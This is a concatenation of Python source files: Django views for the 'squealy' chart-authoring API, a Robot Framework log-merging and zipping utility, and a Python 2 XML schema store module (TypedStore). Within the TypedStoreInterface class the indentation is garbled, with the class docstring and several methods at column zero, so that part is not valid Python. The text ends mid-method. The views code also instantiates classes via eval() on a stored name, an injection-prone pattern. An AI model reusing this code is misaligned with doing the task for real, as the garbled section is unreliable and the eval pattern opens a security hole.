    def _run_transformations(self, table, transformations):
        """Apply each transformation to the table, in order.

        Raises TransformationException when a transformer rejects its input.
        """
        try:
            for transformation in transformations:
                transformer_instance = eval(transformation.get_name_display())()
                kwargs = transformation.kwargs
                table = transformer_instance.transform(table, **kwargs)
        except ValueError as e:
            # BUG FIX: the original used e.message, which does not exist on
            # Python 3 exceptions and raised AttributeError instead of the
            # intended TransformationException.
            raise TransformationException("Error in transformation - " + str(e))
        return table
class ChartsLoaderView(APIView):
    """CRUD endpoint used by the authoring interface to list, save and
    delete chart definitions."""

    permission_classes = SquealySettings.get_default_permission_classes()
    authentication_classes = [SessionAuthentication, BasicAuthentication]
    authentication_classes.extend(SquealySettings.get_default_authentication_classes())

    def get(self, request, *args, **kwargs):
        """Return all chart definitions, serialized."""
        charts = Chart.objects.all()
        response = ChartSerializer(charts, many=True).data
        return Response(response)

    def delete(self, request):
        """Delete the chart whose id is given in the request body."""
        chart = Chart.objects.filter(id=request.data['id']).first()
        # ROBUSTNESS FIX: .first() returns None for an unknown id; the
        # original then crashed with AttributeError on None.delete().
        if chart is not None:
            chart.delete()
        return Response({})

    def post(self, request):
        """Create or update a chart and its related transformations,
        parameters and validations.

        Related objects are upserted by name; any not present in the payload
        are deleted, so stored state mirrors the payload exactly.
        Raises MalformedChartDataException when a required key is missing.
        """
        try:
            data = request.data['chart']
            chart_object = Chart(id=data['id'], name=data['name'], url=data['url'], query=data['query'],
                                 type=data['type'], options=data['options'])
            chart_object.save()
            chart_id = chart_object.id
            # (A dead `Chart.objects.all().prefetch_related(...)` statement
            # was removed here: the lazy queryset was never evaluated.)

            # Transformations: upsert by name, then delete leftovers.
            transformation_ids = []
            existing_transformations = {transformation.name: transformation.id
                                        for transformation in chart_object.transformations.all()}
            with transaction.atomic():
                for transformation in data['transformations']:
                    existing_id = existing_transformations.get(transformation['name'], None)
                    transformation_object = Transformation(id=existing_id, name=transformation['name'],
                                                           kwargs=transformation.get('kwargs', None),
                                                           chart=chart_object)
                    transformation_object.save()
                    transformation_ids.append(transformation_object.id)
                Transformation.objects.filter(chart=chart_object).exclude(id__in=transformation_ids).all().delete()

            # Parameters: upsert by name, then delete leftovers.
            parameter_ids = []
            existing_parameters = {param.name: param.id
                                   for param in chart_object.parameters.all()}
            with transaction.atomic():
                for parameter in data['parameters']:
                    existing_id = existing_parameters.get(parameter['name'], None)
                    parameter_object = Parameter(id=existing_id, name=parameter['name'], data_type=parameter['data_type'],
                                                 mandatory=parameter['mandatory'],
                                                 default_value=parameter['default_value'],
                                                 test_value=parameter['test_value'], chart=chart_object,
                                                 kwargs=parameter['kwargs'])
                    parameter_object.save()
                    parameter_ids.append(parameter_object.id)
                Parameter.objects.filter(chart=chart_object).exclude(id__in=parameter_ids).all().delete()

            # Validations: upsert by name, then delete leftovers.
            validation_ids = []
            existing_validations = {validation.name: validation.id
                                    for validation in chart_object.validations.all()}
            with transaction.atomic():
                for validation in data['validations']:
                    existing_id = existing_validations.get(validation['name'], None)
                    validation_object = Validation(id=existing_id, query=validation['query'], name=validation['name'],
                                                   chart=chart_object)
                    validation_object.save()
                    validation_ids.append(validation_object.id)
                Validation.objects.filter(chart=chart_object).exclude(id__in=validation_ids).all().delete()
        except KeyError as e:
            raise MalformedChartDataException("Key Error - " + str(e.args))
        return Response(chart_id, status.HTTP_200_OK)
@api_view(['GET'])
@permission_classes(SquealySettings.get('Authoring_Interface_Permission_Classes', (IsAdminUser, )))
def squealy_interface(request):
    """
    Renders the squealy authoring interface template (index.html).

    Access is restricted to the permission classes configured under
    'Authoring_Interface_Permission_Classes', defaulting to admin users.
    """
    return render(request, 'index.html')
| devashishsharma2302/testing-heroku-deployment | squealy/views.py | Python | mit | 11,267 |
import commandRunner as cr
import subprocess
import glob, os, platform, shutil, adb
from pathlib import Path
def combine_browsers_logs(udid):
    """Merge per-device Robot Framework results under browserlogs/.

    Runs ``rebot`` over every device's output.xml to produce a combined
    report, then copies each device's screenshots up into browserlogs/ so
    the combined log can resolve them.

    :param udid: iterable of device identifiers (sub-directory names).
    """
    base = os.path.join(os.getcwd(), "browserlogs")
    cmd = 'rebot -N Combined --outputdir browserlogs/ '
    # os.path.join picks the right separator, so no per-platform branching.
    for device in udid:
        cmd += os.path.join(base, device, "output.xml") + " "
    cr.run_command(cmd)
    # Copy screenshots next to the combined report. Originals stay in place
    # (as before: shutil.copy was used). BUG FIX: the old cleanup
    # `pngs = [p for p in pngs if not p]` was a no-op — path strings are
    # always truthy, so it just emptied a local list; it has been dropped.
    for device in udid:
        for png in glob.glob(os.path.join(base, device, "*.png")):
            shutil.copy(png, os.path.join(base, os.path.basename(png)))
def combine_logs(udid):
    """Merge per-device, per-run Robot Framework results under logs/.

    Runs ``rebot`` over every <device>_*/output.xml, then moves all
    screenshots from the run sub-directories into logs/ so the combined
    report can resolve them.

    :param udid: iterable of device identifiers (run directories are named
        "<device>_<suffix>").
    """
    base = os.path.join(os.getcwd(), "logs")
    cmd = 'rebot -N Combined --outputdir logs/ '
    # os.path.join picks the right separator, so no per-platform branching.
    for device in udid:
        cmd += os.path.join(base, device + "_" + "*", "output.xml") + " "
    cr.run_command(cmd)
    # Move screenshots one level up into logs/. BUG FIX: the original
    # repeated this sweep once per device (the loop variable was unused),
    # re-scanning files already moved; a single pass is equivalent.
    # Note: "*" matches one directory level, same as the original's "**"
    # without recursive=True.
    for png in glob.glob(os.path.join(base, "*", "*.png")):
        if Path(png).is_file():
            shutil.move(png, os.path.join(base, os.path.basename(png)))
def zip_logs():
    """Archive the logs/ directory into a timestamped zip in the cwd."""
    from datetime import datetime  # local import keeps module imports unchanged
    stamp = datetime.now().strftime("%Y-%m-%d-%H%M")
    if platform.system() == "Windows":
        # BUG FIX: "$(date +...)" is bash command substitution and fails
        # inside PowerShell; build the timestamp in Python instead.
        cmd = "Compress-Archive logs logs-{}.zip".format(stamp)
        subprocess.call(["powershell.exe", cmd])
    elif platform.system() == "Linux" or platform.system() == "Darwin":
        cmd = "zip -vr logs-{}.zip logs/".format(stamp)
        cr.run_command(cmd)
def zip_browsers_logs():
    """Archive the browserlogs/ directory into a timestamped zip in the cwd."""
    from datetime import datetime  # local import keeps module imports unchanged
    stamp = datetime.now().strftime("%Y-%m-%d-%H%M")
    if platform.system() == "Windows":
        # BUG FIX: "$(date +...)" is bash command substitution and fails
        # inside PowerShell; build the timestamp in Python instead.
        cmd = "Compress-Archive browserlogs browserlogs-{}.zip".format(stamp)
        subprocess.call(["powershell.exe", cmd])
    elif platform.system() == "Linux" or platform.system() == "Darwin":
        cmd = "zip -vr browserlogs-{}.zip browserlogs/".format(stamp)
        cr.run_command(cmd)
def delete_previous_logs():
    """Remove everything under logs/.

    NOTE(review): relies on POSIX `rm`; on Windows this works only if the
    shell used by cr.run_command provides rm (e.g. Git Bash) — confirm.
    """
    cmd = 'rm -rf logs/*'
    cr.run_command(cmd)
def delete_previous_logs_browser():
    """Remove everything under browserlogs/.

    NOTE(review): relies on POSIX `rm`; on Windows this works only if the
    shell used by cr.run_command provides rm (e.g. Git Bash) — confirm.
    """
    cmd = 'rm -rf browserlogs/*'
    cr.run_command(cmd)
# This module contains a class for storing data in an XML tree:
#
# TypedStore: this class combines a XML schema file (XSD-like) with an XML tree in
# which values are stored.
# Value types are obtained from the schema definition. Additionally, the TypedStore
# supports (conditional) hiding of nodes, notifications before/after changing of node
# values and node visiblity, a set of default values, arbitrary data streams that are
# stored aside the XML value tree, encapsulating containers such as ZIP, and many other features.
# Import modules from standard Python library
import codecs
import os
import re
import StringIO
import sys
import xml.dom.minidom

# Import own custom modules
import util, datatypes, versioning
# Bit-flag constants selecting a node-replacement policy when merging store
# values; values combine with bitwise OR (replaceAlways = 1|2|4 enables all).
# NOTE(review): the consuming merge logic lies outside this chunk; the
# per-flag semantics are inferred from the names — confirm against it.
replaceNever = 0
replaceExistingValues = 1
replaceWithEmpty = 2
replaceRemoveOldChildren = 4
replaceAlways = 7
class ValidationException(Exception):
    """Exception type for TypedStore validation failures (raise sites are
    outside this chunk)."""
    pass
class Schema(object):
    """Class for managing XML-based schemas, used to define TypedStore objects.
    Supports caching of schemas (based on file path), parsing of schemas
    (i.e., inserting linked templates, resolving dependencies), and provides
    access to the main properties (version and root of the XML tree).
    """
    # Class-level cache of parsed schemas, keyed by absolute file path.
    cache = {}
    # Symbolic name -> directory map used to expand [name] tokens in linked
    # paths (see resolveLinkedPath).
    knownpaths = {}

    @staticmethod
    def create(source,cache=True):
        """Creates a schema from file or DOM tree object. If a file path is
        provided, the created schema is cached, and returned on subsequent
        request for schemas with the same path.
        """
        if cache and isinstance(source,basestring):
            path = os.path.abspath(source)
            if path in Schema.cache:
                schema = Schema.cache[path]
            else:
                schema = Schema(source)
                Schema.cache[path] = schema
        else:
            schema = Schema(source)
        return schema

    def __init__(self,source,sourceisxml=False):
        """Initializes a new Schema from the specified source.
        A source can be a path to an XML file, a string containing XML or a
        xml.dom.minidom DOM object. If it is a string containing XML, argument
        "sourceisxml" must be set to True; otherwise the source is interpreted
        as a path to an XML file.
        """
        path = ''
        if isinstance(source,basestring):
            # The provided schema source is a string: either a path or plain XML.
            if not sourceisxml:
                # The provided source is a path.
                path = os.path.abspath(source)
                if not os.path.isfile(path):
                    raise Exception('XML schema file "%s" does not exist.' % path)
                self.dom = xml.dom.minidom.parse(path)
            else:
                # The provided source is a string containing XML.
                self.dom = xml.dom.minidom.parseString(source)
        elif isinstance(source,xml.dom.minidom.Document):
            # The provided source is a DOM object
            self.dom = source
        else:
            assert False, 'First argument (the schema source) must either be a string or an XML DOM tree. Received argument: %s.' % str(source)
        # In addition to "element" nodes, a Schema can contain "link" nodes
        # that reference either a "template" node within the same schema, or
        # the root node of another XML file. Replace all links by their target.
        Schema.resolveLinks(self.dom,path)
        # For every variable: build a list of variables/folders that depend on its value.
        self.buildDependencies()

    @staticmethod
    def resolveLinkedPath(path,refpath=''):
        """Expands [name] tokens in *path* via Schema.knownpaths and returns
        the absolute path, resolved relative to *refpath*'s directory."""
        while True:
            match = re.match('\[(\w+)]',path)
            if match is None: break
            exp = match.group(1)
            assert exp in Schema.knownpaths, 'Do not know the location of "%s" in linked path "%s".' % (exp,path)
            path = os.path.join(path[:match.start(0)],Schema.knownpaths[exp],path[match.end(0)+1:])
        return os.path.abspath(os.path.join(os.path.dirname(refpath),path))

    @staticmethod
    def resolveLinks(dom,sourcepath):
        """Replaces every "link" node in *dom* by the node it references:
        either an internal "template" node or a node from another XML file.
        Returns True if any link was resolved."""
        links = dom.getElementsByTagName('link')
        templates = dict([(node.getAttribute('id'),node) for node in dom.getElementsByTagName('template')])
        for link in links:
            assert link.hasAttribute('path') or link.hasAttribute('template'), 'Link node does not have "path" or "template" attribute.'
            if link.hasAttribute('path'):
                # We need to copy from an external XML document.
                linkedpath = Schema.resolveLinkedPath(link.getAttribute('path'),sourcepath)
                if not os.path.isfile(linkedpath):
                    raise Exception('Linked XML schema file "%s" does not exist. Source: %s' % (linkedpath,sourcepath))
                link.setAttribute('sourcepath',linkedpath)
                childdom = xml.dom.minidom.parse(linkedpath)
                # Recursively resolve links in the linked document as well.
                Schema.resolveLinks(childdom,linkedpath)
                templateroot = childdom.documentElement
                if link.hasAttribute('node'):
                    linkednode = link.getAttribute('node')
                    templateroot = Schema.getNodeFromPath(linkednode.split('/'),templateroot)
                    assert templateroot is not None, 'Unable to locate node "%s" in "%s".' % (linkednode,linkedpath)
            else:
                # We need to copy from an internal template.
                templateid = link.getAttribute('template')
                assert templateid in templates, 'Cannot find template "%s".' % templateid
                templateroot = templates[templateid]
            linkparent = link.parentNode
            # Copy the target node in place of the link.
            newnode = util.copyNode(templateroot,linkparent,targetdoc=dom,name='element',before=link)
            # Copy attributes and children of the link node to the new node.
            for key in link.attributes.keys():
                if key not in ('path','template','node'):
                    newnode.setAttribute(key,link.getAttribute(key))
            for ch in link.childNodes:
                util.copyNode(ch,newnode,targetdoc=dom)
            # Remove link node
            linkparent.removeChild(link)
        return len(links)>0

    def getRoot(self):
        """Returns the root of the schema DOM tree."""
        return self.dom.documentElement

    def getVersion(self):
        """Returns the schema version string."""
        return self.dom.documentElement.getAttribute('version')

    # buildDependencies: for every variable node, this creates lists of dependent nodes
    # (i.e. folders and variables that have one or more conditions that depend on the
    # variable under investigation). Essentially we convert lists of dependencies ('servant'-centric)
    # into lists of dependent nodes ('controller'-centric). We need the latter in order to selectively
    # re-check conditions (and hide/show corresponding nodes) after the value of
    # a dependency ('controller') changes.
    def buildDependencies(self,root=None,curpath='',curowner=None):
        if root is None: root=self.dom.documentElement
        for ch in root.childNodes:
            if ch.nodeType==ch.ELEMENT_NODE:
                if ch.localName=='element':
                    childcurpath = curpath+'/'+ch.getAttribute('name')
                    self.buildDependencies(root=ch,curpath=childcurpath,curowner=ch)
                    if ch.hasAttribute('unit'):
                        # A unit of the form "[path]" means the unit is taken
                        # from another node's value: register the dependency.
                        unit = ch.getAttribute('unit')
                        if unit and unit[0]=='[' and unit[-1]==']':
                            unitnode,relcurpath = self.getReversePath(ch,unit[1:-1],absourcepath=childcurpath)
                            self.registerDependency(unitnode,relcurpath,'unit')
                elif ch.localName=='condition':
                    assert curowner.getAttribute('maxOccurs') in ('','1'), 'Currently conditions on optional nodes are not supported.'
                    if ch.hasAttribute('source'): continue
                    if ch.hasAttribute('variable'):
                        # Get the referenced node, and the relative path from there to here.
                        depnode,relcurpath = self.getReversePath(curowner,ch.getAttribute('variable'),absourcepath=curpath)
                        # Register the current node with the referenced node,
                        # so that a change in the referenced node can trigger
                        # an update in the visibility of the current node.
                        self.registerDependency(depnode,relcurpath,'visibility')
                    self.buildDependencies(root=ch,curpath=curpath,curowner=curowner)
                elif ch.localName=='options':
                    curowner.setAttribute('hasoptions',True)

    # getNodeFromPath: obtains template node at given path
    # (path specification consists of array of node ids)
    @staticmethod
    def getNodeFromPath(path,root):
        """Obtains DOM node in schema at specified path. If a reference node
        is provided, the path is assumed to be relative to the reference node.
        If no reference node is provided, the path is assumed absolute, that is,
        relative to the schema root element."""
        for childname in path:
            if childname=='..':
                root = root.parentNode
                assert root.nodeType!=root.DOCUMENT_NODE,'Cannot go up one level; already at the schema root.'
            elif childname!='' and childname!='.':
                for root in root.childNodes:
                    if root.nodeType==root.ELEMENT_NODE and root.localName=='element' and root.getAttribute('name')==childname:
                        break
                else:
                    return None
        return root

    # getPathFromNode: obtains path specification for given template node
    # (path specification consists of node ids with slash separators)
    def getPathFromNode(self,node):
        """Gets the absolute path of the specified node, as an array of path
        components. The absolute path is defined as the path relative to the
        schema root element.
        """
        path = []
        while node.parentNode.parentNode is not None:
            path.insert(0,node.getAttribute('name'))
            node = node.parentNode
        return path

    def getReversePath(self,sourcenode,targetpath,absourcepath=None):
        """Takes a schema reference node, and the path of another node which
        may be relative to the reference node, and returns the referenced target
        node plus the (potentially relative) path from the target node to the
        source node.
        The absolute path to the source node may be provided; this saves
        computational effort only.
        """
        # BUG FIX: the computed fallback path was previously discarded
        # (missing assignment), leaving absourcepath as None.
        if absourcepath is None: absourcepath = '/'.join(self.getPathFromNode(sourcenode))
        refnode = self.dom.documentElement
        if targetpath[0]!='/': refnode = sourcenode.parentNode
        splittargetpath = targetpath.split('/')
        targetnode = Schema.getNodeFromPath(splittargetpath,refnode)
        assert targetnode is not None, 'Cannot locate target node "%s" for node "%s".' % (targetpath,absourcepath)
        abstargetpath = self.getPathFromNode(targetnode)
        assert len(abstargetpath)!=0, 'Target node "%s" for node "%s" corresponds to the root of the DOM tree. This is not allowed.' % (targetpath,absourcepath)
        if '.' in splittargetpath or '..' in splittargetpath:
            # Find a relative path from the referenced node to the current node.
            abstargetpath.pop() # The reference node will be the parent of the specified node
            abscurpath = [n for n in absourcepath.split('/') if n!='']
            istart = 0
            while istart<len(abstargetpath) and istart<len(abscurpath) and abstargetpath[istart]==abscurpath[istart]: istart+=1
            return targetnode,(len(abstargetpath)-istart)*'../'+'/'.join(abscurpath[istart:])
        else:
            # Use the absolute path of the current node.
            return targetnode,absourcepath

    def registerDependency(self,node,dependantnodepath,deptype):
        """For the given template node, registers that another node at the
        specified (potentially relative) path depends on it.
        deptype is 'unit' or 'visibility' (see buildDependencies).
        """
        deplist = util.findDescendantNode(node,['dependentvariables'],create=True)
        depnode = self.dom.createElementNS(deplist.namespaceURI,'dependentvariable')
        depnode.setAttribute('path',dependantnodepath)
        depnode.setAttribute('type',deptype)
        deplist.appendChild(depnode)

    def createDocumentation(self,fout=None,showhidden=False):
        """Writes an HTML table documenting the schema to *fout* (defaults
        to standard output). Hidden nodes are included only if *showhidden*
        is True."""
        # Get maximum depth of the tree
        def getmaxdepth(node):
            maxdepth = 1
            for ch in node.childNodes:
                if ch.nodeType==ch.ELEMENT_NODE and ch.localName=='element':
                    maxdepth = max(maxdepth,1+getmaxdepth(ch))
            return maxdepth
        maxdepth = getmaxdepth(self.dom.documentElement)

        # Function for printing a node and its children
        def printnode(fout,node,maxdepth,nextid,depth=0,showhidden=False):
            # Print info on the node itself
            if showhidden or not node.hasAttribute('hidden'):
                fout.write('\t<tr valign="top">')
                for i in range(depth): fout.write('<td> </td>')
                fout.write('<td colspan="%i">%s</td>' % (maxdepth-depth,node.getAttribute('name')))
                if node.hasAttribute('type'):
                    fout.write('<td>%s</td>' % node.getAttribute('type'))
                else:
                    fout.write('<td> </td>')
                if node.hasAttribute('description'):
                    text = node.getAttribute('description')
                elif node.hasAttribute('label'):
                    text = node.getAttribute('label')
                else:
                    text = ' '
                opts = []
                for ch in node.childNodes:
                    if ch.nodeType==ch.ELEMENT_NODE and ch.localName=='options':
                        for optch in ch.childNodes:
                            if optch.nodeType==ch.ELEMENT_NODE and optch.localName=='option':
                                if optch.hasAttribute('description'):
                                    label = optch.getAttribute('description')
                                elif optch.hasAttribute('label'):
                                    label = optch.getAttribute('label')
                                else:
                                    label = optch.getAttribute('value')
                                opts.append((optch.getAttribute('value'),label))
                if opts:
                    text += ', <a href="javascript:showhide(\'table%i\')">supported values</a>\n' % nextid
                    text += '<table id="table%i" cellspacing="0" style="display:none">\n' % nextid
                    text += '<tr><th>value</th><th>description</th></tr>\n'
                    text += ''.join(['<tr><td>%s</td><td>%s</td></tr>\n' % o for o in opts])
                    text += '</table>\n'
                fout.write('<td>%s</td></tr>\n' % text)
                nextid += 1
            # Print info on the children.
            for ch in node.childNodes:
                if ch.nodeType==ch.ELEMENT_NODE and ch.localName=='element':
                    nextid = printnode(fout,ch,maxdepth,nextid,depth=depth+1,showhidden=showhidden)
            return nextid

        # Print all information.
        # (sys is imported at module level; previously this line raised
        # NameError because sys was never imported.)
        if fout is None: fout = sys.stdout
        fout.write('<table cellspacing="0">\n')
        for i in range(maxdepth-1): fout.write('<col width="20">')
        fout.write('\t<tr><th colspan="%i">node name</th><th>data type</th><th>description</th></tr>\n' % maxdepth)
        # BUG FIX: showhidden was previously passed positionally into the
        # "depth" parameter of printnode; pass it by keyword instead.
        printnode(fout,self.dom.documentElement,maxdepth,0,showhidden=showhidden)
        fout.write('</table>\n')
import UserDict
class ShortcutDictionary(UserDict.DictMixin):
    """Dictionary-like map from short names to file paths, with a helper to
    populate it from the files in a directory."""

    @staticmethod
    def fromDirectory(path,**kwargs):
        """Creates a dictionary pre-filled from the files in *path*."""
        shortcuts = ShortcutDictionary()
        shortcuts.addDirectory(path,**kwargs)
        return shortcuts

    def __init__(self):
        self.links = {}

    def __getitem__(self,item):
        return self.links[item]

    def __setitem__(self,item,value):
        self.links[item] = value

    def __delitem__(self,item):
        del self.links[item]

    def keys(self):
        return self.links.keys()

    def addDirectory(self,path,extension='.xml'):
        """Registers every file in *path* whose extension equals *extension*
        under its base name (file name without extension)."""
        for entry in os.listdir(path):
            fullpath = os.path.join(path,entry)
            if not os.path.isfile(fullpath):
                continue
            basename,ext = os.path.splitext(entry)
            if ext==extension:
                self.links[basename] = fullpath
class TypedStoreInterface(object):
"""This class provides an interface to a TypedStore object. The interface
can be configured at initialization to (1) hide nodes with the "hidden"
property set and (2) to omit nodes with the "grouponly" attribute set, replacing
them instead with the node's children.
"""
def __init__(self,store,showhidden=True,omitgroupers=False,processDefaultChange=0,interfacetype='gui'):
    """Creates an interface onto *store* (a TypedStore).

    showhidden: whether hidden nodes are exposed through this interface.
    omitgroupers: whether group-only nodes are replaced by their children.
    interfacetype: interface flavor (e.g. 'gui'), matched against node
        "grouponly" values when deciding which groupers to omit.
    """
    self.showhidden = showhidden
    self.omitgroupers = omitgroupers
    self.interfacetype = interfacetype
    self.blockNotifyOfHiddenNodes = not showhidden

    # How to process changes in the default node value
    # -1: never report
    # 0: report only if no explicit value is set (i.e., the default is used)
    # 1: always report
    self.processDefaultChange = processDefaultChange

    # Map of event name -> handler callable; populated via connect().
    self.eventhandlers = {}

    # Register with the store so it forwards events to this interface.
    store.connectInterface(self)
def unlink(self):
    """Detaches this interface; must be called exactly once, after which
    the interface can no longer dispatch events."""
    assert self.eventhandlers is not None, 'unlink called on TypedStoreInterface for the second time.'
    self.eventhandlers = None
def isGrouper(self,node):
    """Returns True if *node* is a pure grouping node that this interface
    should hide, splicing its children into the parent's child list.
    A node is omitted when its "grouponly" value lists 'True' or this
    interface's type."""
    return self.omitgroupers and ('True' in node.grouponly or self.interfacetype in node.grouponly)
def getChildCount(self,node):
    """Returns the number of children of the specified node, as seen
    through this interface (groupers contribute their own child count)."""
    assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
    assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
    total = 0
    for child in node.children:
        if not (child.visible or self.showhidden):
            continue
        # A grouper is transparent: count its children instead of itself.
        total += self.getChildCount(child) if self.isGrouper(child) else 1
    return total
def getChildren(self,node):
    """Returns the children of the specified node, as seen through this
    interface (groupers are replaced by their own children)."""
    assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
    assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
    result = []
    for child in node.children:
        if not (child.visible or self.showhidden):
            continue
        if self.isGrouper(child):
            # Splice the grouper's children in place of the grouper itself.
            result.extend(self.getChildren(child))
        else:
            result.append(child)
    return result
def getParent(self,node):
    """Returns the parent of the specified node as seen through this
    interface, skipping any intermediate grouper nodes."""
    assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
    assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
    ancestor = node.parent
    while self.isGrouper(ancestor):
        ancestor = ancestor.parent
    return ancestor
def getChildByIndex(self,node,index,returnindex=False):
    """Gets the child of the specified node, at the specified index, as
    seen through this interface (grouper children are spliced in-line).

    When *returnindex* is True and the index is beyond the children of
    this node, the remaining index is returned instead of None — used by
    the recursive descent into grouper nodes below.
    """
    assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
    assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
    for child in node.children:
        if child.visible or self.showhidden:
            if self.isGrouper(child):
                # Descend into the grouper; a non-int result is the found node.
                index = self.getChildByIndex(child,index,returnindex=True)
                if not isinstance(index,int): return index
            else:
                if index==0: return child
                index -= 1
    # Not found among (the interface-visible) children.
    if returnindex:
        return index
    else:
        return None
def getOwnIndex(self,node):
    """Returns the index of the specified node in its list of siblings, as
    seen through this interface (a grouper parent's own index is added,
    and grouper siblings count for all of their children)."""
    assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
    assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
    ind = 0
    par = node.parent
    # If the parent is an omitted grouper, start from the parent's index.
    if self.isGrouper(par): ind = self.getOwnIndex(par)
    for (isib,sib) in enumerate(par.children):
        # Stop at the node itself, or at its future insertion position.
        if sib is node or isib==node.futureindex: break
        if sib.visible or self.showhidden:
            if self.isGrouper(sib):
                ind += self.getChildCount(sib)
            else:
                ind += 1
    else:
        # Loop ran to completion: the node must be pending insertion at the
        # tail position (futureindex).
        assert node.futureindex is not None, 'Could not find node "%s" in children of supposed parent, but future index was also not set. Data: %s' % (node,node.valuenode.toxml('utf-8'))
        assert node.futureindex==len(par.children), 'Could not find node "%s" in children of supposed parent, but future index (%i) was also not set to tailing position (%i).' % (node,node.futureindex,len(par.children))
    return ind
def getDepth(self,node):
"""Gets the maximum depth of the tree of descendants of the specified node."""
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
childmax = 0
for child in self.getChildren(node):
curchilddepth = self.getDepth(child)
if curchilddepth>childmax: childmax = curchilddepth
return childmax+1
def toHtml(self,node,xmldocument,totaldepth,level=0,hidedefaults=False):
    """Returns a list of HTML "tr" nodes that describe the specified node
    and its children.

    totaldepth: total tree depth, used to compute the colspan of each row.
    level: indentation level of this node (negative skips the node's own
        row and emits only its children's rows).
    hidedefaults: rows whose whole subtree holds default values are marked
        with a "default" attribute and hidden via inline style.
    """
    assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
    assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
    res = []

    tr = None
    if level>=0:
        tr = xmldocument.createElement('tr')

        # One empty cell per indentation level.
        for i in range(level):
            td = xmldocument.createElement('td')
            tr.appendChild(td)

        # Cell with the node's display text, spanning the remaining depth.
        td1 = xmldocument.createElement('td')
        templatenode = node.templatenode
        td1.appendChild(xmldocument.createTextNode(node.getText(detail=1)))
        if level+1<totaldepth:
            td1.setAttribute('colspan',unicode(totaldepth-level))
        tr.appendChild(td1)

        # Cell with the node's (default-resolved) value, if it can have one.
        td2 = xmldocument.createElement('td')
        if node.canHaveValue():
            val = node.getValueAsString(usedefault=True)
        else:
            val = ' '
        td2.appendChild(xmldocument.createTextNode(val))
        tr.appendChild(td2)

        res.append(tr)

    # Recurse into interface-visible children, one level deeper.
    childtrs = []
    for child in self.getChildren(node):
        childnodes = self.toHtml(child,xmldocument,totaldepth,level+1,hidedefaults=hidedefaults)
        childtrs += childnodes
    res += childtrs

    if tr is not None and hidedefaults:
        # The row is "default" only if the node itself holds its default
        # value and every child row was also marked default.
        isdefault = True
        if node.canHaveValue() and not node.hasDefaultValue():
            isdefault = False
        else:
            for childtr in childtrs:
                if not childtr.hasAttribute('default'):
                    isdefault = False
                    break
        if isdefault:
            tr.setAttribute('style','display:none')
            tr.setAttribute('default','')

    return res
# ---------------------------------------------------------------------------
# Functions for connecting to events
# ---------------------------------------------------------------------------
def connect(self,eventname,handler):
assert eventname in ('beforeVisibilityChange','afterVisibilityChange','afterStoreChange','beforeChange','afterChange'), 'attempt to register for unknown event "%s".' % eventname
assert eventname not in self.eventhandlers, 'handler for event "%s" exists.' % eventname
self.eventhandlers[eventname] = handler
def addChangeHandler(self,callback):
assert not self.changehandlers, 'change handler exists'
self.changehandlers.append(callback)
# ---------------------------------------------------------------------------
# Functions called by store when events occur
# ---------------------------------------------------------------------------
    def beforeVisibilityChange(self,node,shownew,showhide):
        """Called by the store before the visibility of a node changes.

        Records the node as the pending change (checked by
        afterVisibilityChange), then forwards the notification to the
        registered handler, expanding grouper nodes into their children.
        shownew: whether the node becomes visible; showhide: whether this
        is a show/hide (as opposed to an add/remove) transition.
        """
        assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
        assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
        #print 'beforeVisibilityChange'
        self.upcomingvizchange = node
        if 'beforeVisibilityChange' not in self.eventhandlers: return
        # NOTE(review): getParent(node) would be None for the root node — assumes the root is never passed here; confirm.
        if self.blockNotifyOfHiddenNodes and self.getParent(node).isHidden(): return
        if self.blockNotifyOfHiddenNodes and (not showhide) and node.isHidden(): return
        if self.isGrouper(node):
            # Groupers are transparent: notify about their children instead.
            children = self.getChildren(node)
            if len(children)==0: return
            self.eventhandlers['beforeVisibilityChange'](children,shownew,showhide)
        else:
            self.eventhandlers['beforeVisibilityChange']((node,),shownew,showhide)
    def afterVisibilityChange(self,node,shownew,showhide):
        """Called by the store after the visibility of a node has changed.

        Must be paired with a preceding beforeVisibilityChange for the same
        node; forwards the notification to the registered handler, expanding
        grouper nodes into their children.
        """
        assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
        assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
        assert node==self.upcomingvizchange, 'The node supplied to afterVisibilityChange (%s) was not the last one supplied to beforeVisibilityChange (%s).' % (node,self.upcomingvizchange)
        #print 'afterVisibilityChange'
        self.upcomingvizchange = None
        if 'afterVisibilityChange' not in self.eventhandlers: return
        # NOTE(review): getParent(node) would be None for the root node — assumes the root is never passed here; confirm.
        if self.blockNotifyOfHiddenNodes and self.getParent(node).isHidden(): return
        if self.blockNotifyOfHiddenNodes and (not showhide) and node.isHidden(): return
        if self.isGrouper(node):
            # Groupers are transparent: notify about their children instead.
            children = self.getChildren(node)
            if len(children)==0: return
            self.eventhandlers['afterVisibilityChange'](children,shownew,showhide)
        else:
            self.eventhandlers['afterVisibilityChange']((node,),shownew,showhide)
def afterStoreChange(self):
#print 'afterStoreChange'
if 'afterStoreChange' not in self.eventhandlers: return
self.eventhandlers['afterStoreChange']()
def onBeforeChange(self,node,newvalue):
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
#print 'onBeforeChange'
if 'beforeChange' not in self.eventhandlers: return True
if node.isHidden() and self.blockNotifyOfHiddenNodes: return True
return self.eventhandlers['beforeChange'](node,newvalue)
def onChange(self,node,feature):
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
#print 'onChange'
